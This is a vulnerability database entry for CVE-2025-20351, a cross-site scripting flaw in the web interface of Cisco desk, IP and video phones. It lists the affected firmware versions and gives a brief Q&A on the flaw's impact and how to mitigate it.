CVE-2025-20351
BaseFortify
Publication date: 2025-10-15
Last updated on: 2025-12-04
Assigner: Cisco Systems, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cisco | desk_phone_9871_firmware | From 3.0\(1\) (inc) to 3.2\(1\) (inc) |
| cisco | desk_phone_9871 | * |
| cisco | desk_phone_9841_firmware | From 3.0\(1\) (inc) to 3.2\(1\) (inc) |
| cisco | desk_phone_9841 | * |
| cisco | desk_phone_9851_firmware | From 3.0\(1\) (inc) to 3.2\(1\) (inc) |
| cisco | desk_phone_9851 | * |
| cisco | desk_phone_9861_firmware | From 3.0\(1\) (inc) to 3.2\(1\) (inc) |
| cisco | desk_phone_9861 | * |
| cisco | ip_phone_8865_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_8865_firmware | 14.3\(1\) |
| cisco | ip_phone_8865_firmware | 14.3\(1\) |
| cisco | ip_phone_8865 | * |
| cisco | ip_phone_7811_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_7811_firmware | 14.3\(1\) |
| cisco | ip_phone_7811_firmware | 14.3\(1\) |
| cisco | ip_phone_7811 | * |
| cisco | ip_phone_7821_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_7821_firmware | 14.3\(1\) |
| cisco | ip_phone_7821_firmware | 14.3\(1\) |
| cisco | ip_phone_7821 | * |
| cisco | ip_phone_7841_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_7841_firmware | 14.3\(1\) |
| cisco | ip_phone_7841_firmware | 14.3\(1\) |
| cisco | ip_phone_7841 | * |
| cisco | ip_phone_7861_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_7861_firmware | 14.3\(1\) |
| cisco | ip_phone_7861_firmware | 14.3\(1\) |
| cisco | ip_phone_7861 | * |
| cisco | ip_phone_8811_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_8811_firmware | 14.3\(1\) |
| cisco | ip_phone_8811_firmware | 14.3\(1\) |
| cisco | ip_phone_8811 | * |
| cisco | ip_phone_8832_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_8832_firmware | 14.3\(1\) |
| cisco | ip_phone_8832_firmware | 14.3\(1\) |
| cisco | ip_phone_8832 | * |
| cisco | ip_phone_8841_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_8841_firmware | 14.3\(1\) |
| cisco | ip_phone_8841_firmware | 14.3\(1\) |
| cisco | ip_phone_8841 | * |
| cisco | ip_phone_8845_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_8845_firmware | 14.3\(1\) |
| cisco | ip_phone_8845_firmware | 14.3\(1\) |
| cisco | ip_phone_8845 | * |
| cisco | ip_phone_8851_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_8851_firmware | 14.3\(1\) |
| cisco | ip_phone_8851_firmware | 14.3\(1\) |
| cisco | ip_phone_8851 | * |
| cisco | ip_phone_8861_firmware | to 14.3\(1\) (exc) |
| cisco | ip_phone_8861_firmware | 14.3\(1\) |
| cisco | ip_phone_8861_firmware | 14.3\(1\) |
| cisco | ip_phone_8861 | * |
| cisco | ip_phone_8821_firmware | to 11.0\(1\) (exc) |
| cisco | ip_phone_8821_firmware | 11.0\(0.7\) |
| cisco | ip_phone_8821_firmware | 11.0\(1\) |
| cisco | ip_phone_8821_firmware | 11.0\(2\) |
| cisco | ip_phone_8821_firmware | 11.0\(2\) |
| cisco | ip_phone_8821_firmware | 11.0\(2\) |
| cisco | ip_phone_8821_firmware | 11.0\(3\) |
| cisco | ip_phone_8821_firmware | 11.0\(3\) |
| cisco | ip_phone_8821_firmware | 11.0\(3\) |
| cisco | ip_phone_8821_firmware | 11.0\(3\) |
| cisco | ip_phone_8821_firmware | 11.0\(3\) |
| cisco | ip_phone_8821_firmware | 11.0\(3\) |
| cisco | ip_phone_8821_firmware | 11.0\(3\) |
| cisco | ip_phone_8821_firmware | 11.0\(4\) |
| cisco | ip_phone_8821_firmware | 11.0\(4\) |
| cisco | ip_phone_8821_firmware | 11.0\(4\) |
| cisco | ip_phone_8821_firmware | 11.0\(4\) |
| cisco | ip_phone_8821_firmware | 11.0\(5\) |
| cisco | ip_phone_8821_firmware | 11.0\(5\) |
| cisco | ip_phone_8821_firmware | 11.0\(5\) |
| cisco | ip_phone_8821_firmware | 11.0\(5\) |
| cisco | ip_phone_8821_firmware | 11.0\(6\) |
| cisco | ip_phone_8821_firmware | 11.0\(6\) |
| cisco | ip_phone_8821_firmware | 11.0\(6\) |
| cisco | ip_phone_8821_firmware | 11.0\(6\) |
| cisco | ip_phone_8821_firmware | 11.0\(6\) |
| cisco | ip_phone_8821_firmware | 11.0\(6\) |
| cisco | ip_phone_8821 | * |
| cisco | video_phone_8875_firmware | to 2.3\(1\) (exc) |
| cisco | video_phone_8875_firmware | From 3.0\(1\) (inc) to 3.2\(1\) (inc) |
| cisco | video_phone_8875_firmware | 2.3\(1\) |
| cisco | video_phone_8875_firmware | 2.3\(1\) |
| cisco | video_phone_8875 | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a cross-site scripting (XSS) issue in the web UI of certain Cisco Desk Phones and Video Phones running Cisco SIP Software. It occurs because the web UI does not properly validate user-supplied input, allowing an unauthenticated remote attacker to craft a malicious link that, when clicked by a user, can execute arbitrary script code within the context of the web interface or access sensitive browser-based information.
How can this vulnerability impact me? :
If exploited, this vulnerability could allow an attacker to run arbitrary scripts in the user's browser session on the affected device's web UI. This could lead to unauthorized access to sensitive information displayed in the browser or manipulation of the web interface, potentially compromising the security and privacy of the user. However, exploitation requires the phone to be registered to Cisco Unified Communications Manager and have Web Access enabled, which is disabled by default.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, ensure that Web Access on affected Cisco phones is disabled if not needed, as it is disabled by default. Additionally, avoid clicking on untrusted or suspicious links that could exploit the web UI. Keep the devices updated with the latest Cisco software patches when they become available.